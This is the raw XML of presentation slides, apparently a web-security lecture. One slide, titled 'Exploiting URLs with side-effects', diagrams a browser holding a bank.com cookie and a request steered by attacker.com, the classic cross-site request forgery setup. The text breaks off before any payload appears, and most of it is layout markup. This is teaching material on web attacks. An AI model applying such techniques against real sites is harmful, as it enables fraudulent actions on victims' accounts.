            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="3844925"/>
            <a:ext cx="1411288" cy="6032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0923" name="object 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4C4AB4A-6A2D-364E-A955-FF12E89E5571}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="38100" y="3895725"/>
            <a:ext cx="1309688" cy="50165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0924" name="object 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58231A2C-8E8F-0E4B-B432-DFEE161DFA8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="38100" y="3895725"/>
            <a:ext cx="1309688" cy="501650"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1195575 w 1309370"/>
              <a:gd name="T1" fmla="*/ 0 h 501650"/>
              <a:gd name="T2" fmla="*/ 120719 w 1309370"/>
              <a:gd name="T3" fmla="*/ 0 h 501650"/>
              <a:gd name="T4" fmla="*/ 73736 w 1309370"/>
              <a:gd name="T5" fmla="*/ 9436 h 501650"/>
              <a:gd name="T6" fmla="*/ 35369 w 1309370"/>
              <a:gd name="T7" fmla="*/ 35169 h 501650"/>
              <a:gd name="T8" fmla="*/ 9480 w 1309370"/>
              <a:gd name="T9" fmla="*/ 73337 h 501650"/>
              <a:gd name="T10" fmla="*/ 0 w 1309370"/>
              <a:gd name="T11" fmla="*/ 120078 h 501650"/>
              <a:gd name="T12" fmla="*/ 0 w 1309370"/>
              <a:gd name="T13" fmla="*/ 381076 h 501650"/>
              <a:gd name="T14" fmla="*/ 9480 w 1309370"/>
              <a:gd name="T15" fmla="*/ 427816 h 501650"/>
              <a:gd name="T16" fmla="*/ 35369 w 1309370"/>
              <a:gd name="T17" fmla="*/ 465985 h 501650"/>
              <a:gd name="T18" fmla="*/ 73736 w 1309370"/>
              <a:gd name="T19" fmla="*/ 491718 h 501650"/>
              <a:gd name="T20" fmla="*/ 120719 w 1309370"/>
              <a:gd name="T21" fmla="*/ 501154 h 501650"/>
              <a:gd name="T22" fmla="*/ 1195575 w 1309370"/>
              <a:gd name="T23" fmla="*/ 501154 h 501650"/>
              <a:gd name="T24" fmla="*/ 1242573 w 1309370"/>
              <a:gd name="T25" fmla="*/ 491718 h 501650"/>
              <a:gd name="T26" fmla="*/ 1280951 w 1309370"/>
              <a:gd name="T27" fmla="*/ 465985 h 501650"/>
              <a:gd name="T28" fmla="*/ 1306823 w 1309370"/>
              <a:gd name="T29" fmla="*/ 427816 h 501650"/>
              <a:gd name="T30" fmla="*/ 1316309 w 1309370"/>
              <a:gd name="T31" fmla="*/ 381076 h 501650"/>
              <a:gd name="T32" fmla="*/ 1316309 w 1309370"/>
              <a:gd name="T33" fmla="*/ 120078 h 501650"/>
              <a:gd name="T34" fmla="*/ 1306823 w 1309370"/>
              <a:gd name="T35" fmla="*/ 73337 h 501650"/>
              <a:gd name="T36" fmla="*/ 1280951 w 1309370"/>
              <a:gd name="T37" fmla="*/ 35169 h 501650"/>
              <a:gd name="T38" fmla="*/ 1242573 w 1309370"/>
              <a:gd name="T39" fmla="*/ 9436 h 501650"/>
              <a:gd name="T40" fmla="*/ 1195575 w 1309370"/>
              <a:gd name="T41" fmla="*/ 0 h 501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9370" h="501650">
                <a:moveTo>
                  <a:pt x="1189205" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="120081" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73340" y="9436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35171" y="35169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9436" y="73337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="120078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="381076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9436" y="427816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35171" y="465985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73340" y="491718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120081" y="501154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1189205" y="501154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1235953" y="491718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1274125" y="465985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1299860" y="427816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1309296" y="381076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1309296" y="120078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1299860" y="73337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1274125" y="35169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1235953" y="9436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1189205"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0925" name="object 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DE27943-8AC4-AE41-8A48-24556E4C6780}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="163513" y="4000500"/>
            <a:ext cx="10620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700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1700">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80926" name="object 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B66B1BDC-CB06-A546-AA1F-205C5D5730E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="223838" y="4402138"/>
            <a:ext cx="95250" cy="361950"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 109546 w 94614"/>
              <a:gd name="T1" fmla="*/ 361732 h 361950"/>
              <a:gd name="T2" fmla="*/ 50622 w 94614"/>
              <a:gd name="T3" fmla="*/ 310812 h 361950"/>
              <a:gd name="T4" fmla="*/ 29716 w 94614"/>
              <a:gd name="T5" fmla="*/ 270240 h 361950"/>
              <a:gd name="T6" fmla="*/ 14314 w 94614"/>
              <a:gd name="T7" fmla="*/ 225176 h 361950"/>
              <a:gd name="T8" fmla="*/ 4408 w 94614"/>
              <a:gd name="T9" fmla="*/ 175621 h 361950"/>
              <a:gd name="T10" fmla="*/ 0 w 94614"/>
              <a:gd name="T11" fmla="*/ 121573 h 361950"/>
              <a:gd name="T12" fmla="*/ 1084 w 94614"/>
              <a:gd name="T13" fmla="*/ 63033 h 361950"/>
              <a:gd name="T14" fmla="*/ 7664 w 94614"/>
              <a:gd name="T15" fmla="*/ 0 h 3619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4614" h="361950">
                <a:moveTo>
                  <a:pt x="94534" y="361732"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="43681" y="310812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25644" y="270240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12352" y="225176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3804" y="175621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="121573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="936" y="63033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6614"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0927" name="object 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFAA4092-DE1F-8046-B513-26324195C0F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="230188" y="4633913"/>
            <a:ext cx="290512" cy="234950"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 124019 w 290195"/>
              <a:gd name="T1" fmla="*/ 0 h 235585"/>
              <a:gd name="T2" fmla="*/ 0 w 290195"/>
              <a:gd name="T3" fmla="*/ 215840 h 235585"/>
              <a:gd name="T4" fmla="*/ 296625 w 290195"/>
              <a:gd name="T5" fmla="*/ 222015 h 235585"/>
              <a:gd name="T6" fmla="*/ 124019 w 290195"/>
              <a:gd name="T7" fmla="*/ 0 h 2355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195" h="235585">
                <a:moveTo>
                  <a:pt x="121076" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="229044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289585" y="235597"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1210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0928" name="object 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECEA467C-DCE4-3A49-98FD-AA250DC0A21B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5646738" y="4933950"/>
            <a:ext cx="1114425" cy="5524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8" name="object 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6E91B61-C045-7443-AB31-32176B702677}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5802313" y="4572000"/>
            <a:ext cx="1055687" cy="779463"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1293691">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12682">
              <a:spcBef>
                <a:spcPts val="820"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:endParaRPr sz="1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0F64ADC-6C8E-8245-AB28-C000915F759D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="815975" y="217488"/>
            <a:ext cx="8424863" cy="698500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9934" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="4500" spc="20" dirty="0"/>
              <a:t>Exploiting </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4500" spc="-71" dirty="0"/>
              <a:t>URLs </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4500" spc="-4" dirty="0"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4500" spc="16" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4500" spc="31" dirty="0"/>
              <a:t>side-effects</a:t>
            </a:r>
            <a:endParaRPr sz="4500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82947" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7406EFA3-0D1F-D249-9B0A-9BEA596415E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1289050" y="2955925"/>
            <a:ext cx="1466850" cy="15779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2948" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4E8C272-2D76-9F40-A3B4-708E8CC91E9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1317625" y="2965450"/>
            <a:ext cx="1408113" cy="15176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2949" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D4261EB-B622-A746-9F8D-F2913711D268}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295400" y="2965450"/>
            <a:ext cx="1409700" cy="1517650"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1821814"/>
              <a:gd name="T1" fmla="*/ 0 h 1905000"/>
              <a:gd name="T2" fmla="*/ 6457 w 1821814"/>
              <a:gd name="T3" fmla="*/ 0 h 1905000"/>
              <a:gd name="T4" fmla="*/ 6457 w 1821814"/>
              <a:gd name="T5" fmla="*/ 12822 h 1905000"/>
              <a:gd name="T6" fmla="*/ 0 w 1821814"/>
              <a:gd name="T7" fmla="*/ 12822 h 1905000"/>
              <a:gd name="T8" fmla="*/ 0 w 1821814"/>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1814" h="1905000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1821230" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1821230" y="1905000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1905000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="009CFD">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6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0745A2EB-A6BB-D141-9356-D0A73888A1D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1581150" y="3571875"/>
            <a:ext cx="1009650" cy="293688"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9934" defTabSz="715186" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-4" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>owser</a:t>
            </a:r>
            <a:endParaRPr sz="1900" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7F8EDCA-D548-A149-8AB3-970623F2AB98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1562100" y="2438400"/>
            <a:ext cx="923925" cy="441325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9934" defTabSz="715186" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-4" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Client</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82952" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{061C6E0F-0891-7547-9B5A-3F07D5864C7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7807325" y="1857375"/>
            <a:ext cx="2060575" cy="9413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2953" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00D972DC-BB96-F348-9A8E-B5DF15EFD7CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7837488" y="1866900"/>
            <a:ext cx="2000250" cy="9318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12" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{101BBB3A-E849-F449-9228-BCAF6E20F46F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7837488" y="1866900"/>
            <a:ext cx="2068512" cy="931863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF2A06"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="715186" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr sz="2000" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="715186" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="31"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr sz="1900" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="79962" defTabSz="715186" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>attacker.com</a:t>
            </a:r>
            <a:endParaRPr sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D530314C-1A19-3048-90DC-8CE20BBF719A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2755900" y="2133600"/>
            <a:ext cx="4984750" cy="11191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86EAC35A-400D-B24C-BC0A-1109368B9816}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2847975" y="2667000"/>
            <a:ext cx="4892675" cy="10318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object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04C25407-7DC0-1F4D-85EE-4B1068E46C5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2816225" y="2844800"/>
            <a:ext cx="5184775" cy="1803400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6572884" h="2263140">
                <a:moveTo>
                  <a:pt x="6389268" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1457705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="183616" y="2262530"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6572884" y="804824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6389268" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent5"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="accent5"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent5"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="715186" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D0DF13D-4CCF-684D-90BC-56B884EE22CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20880000">
            <a:off x="3114675" y="3582988"/>
            <a:ext cx="3941763" cy="230187"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="715186" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="1751"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" spc="-4" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" spc="-4" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
